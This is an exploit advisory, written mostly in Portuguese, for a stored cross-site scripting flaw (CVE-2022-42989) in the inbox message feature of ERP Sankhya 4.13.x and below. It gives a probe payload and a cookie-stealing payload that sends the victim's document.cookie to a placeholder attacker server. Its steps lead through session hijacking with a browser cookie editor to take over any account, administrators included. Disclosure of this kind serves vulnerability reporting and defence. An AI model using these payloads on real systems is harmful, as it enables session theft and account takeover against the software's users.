ERP Sankhya versions 4.13.x and below suffer from a cross site scripting vulnerability.
1744ed67564a520b1a5d65928e4721a6bdd822c0125cd9c31ecb715595b6e46a
# Exploit Title: ERP Sankhya - XSS to Account Takeover
# Google Dork: N/A
# Date: 19/10/2022
# Exploit Author: Lucas Alves Da Cunha - (0xLucas)
# Vendor Homepage: https://www.sankhya.com.br
# Version: Sankhya Om <= 4.13.x
# Tested on: Sankhya Om 4.11
# CVE: CVE-2022-42989
# Descrição:
Um usuário comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usuário do sistema inclusive administradores, através da função "Caixa de Entrada". No corpo da mensagem, podemos injetar códigos html/javascript levando para um cross site scripting.
Payload para verificar existência da vulnerabilidade:
<img src=1 onerror=alert(1)>
Payload utilizado para capturar os dados da sessão do usuário:
<img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie>
# Passos para reprodução:
1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png
2 - Enviando payload para verificar existência da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png
2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png
3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png
3.1 - Sessão capturada: https://i.imgur.com/aDatjyN.png
Podemos utilizar os dados da sessão capturada e manipular a sessão utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sessão do usuário desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png
# Impacto:
Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usuário do sistema, desde uma simples conta até mesmo uma conta de administrador do sistema, causando assim um grande impacto de negócio.